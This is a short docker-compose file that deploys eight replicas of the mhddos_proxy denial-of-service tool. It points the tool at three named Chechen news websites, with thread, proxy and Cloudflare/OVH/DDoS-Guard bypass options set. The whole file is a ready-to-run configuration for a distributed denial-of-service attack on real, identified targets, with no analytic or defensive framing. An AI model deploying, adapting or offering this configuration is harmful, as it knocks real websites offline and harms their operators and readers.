version: '3'

services:

  bomb01:
    image: portholeascend/mhddos_proxy:latest
    command: https://grozny.tv/ https://chechnyatoday.com/ https://www.checheninfo.ru/ -t 300 -p 600 --proxy-timeout 4 --debug --http-methods DGB CFB OVH
    deploy:
      replicas: 8
